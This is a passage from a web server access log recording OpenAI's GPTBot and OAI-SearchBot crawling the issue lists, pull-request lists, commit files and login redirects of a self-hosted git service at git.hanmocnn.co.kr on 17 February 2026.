AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:01:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 70538] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71847] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118426] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71846] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14323] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:01:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:19:01:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:01:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15661] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:01:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:01:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:01:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:01:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:01:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:01:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:19:01:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:01:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:01:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:01:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:01:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:01:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=all&type=all" -[17/Feb/2026:19:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:01:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:01:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=closed&type=all" -[17/Feb/2026:19:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=closed&type=all" -[17/Feb/2026:19:01:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10090] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:01:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:01:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:01:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:01:40 +0000] - 200 200 - GET https 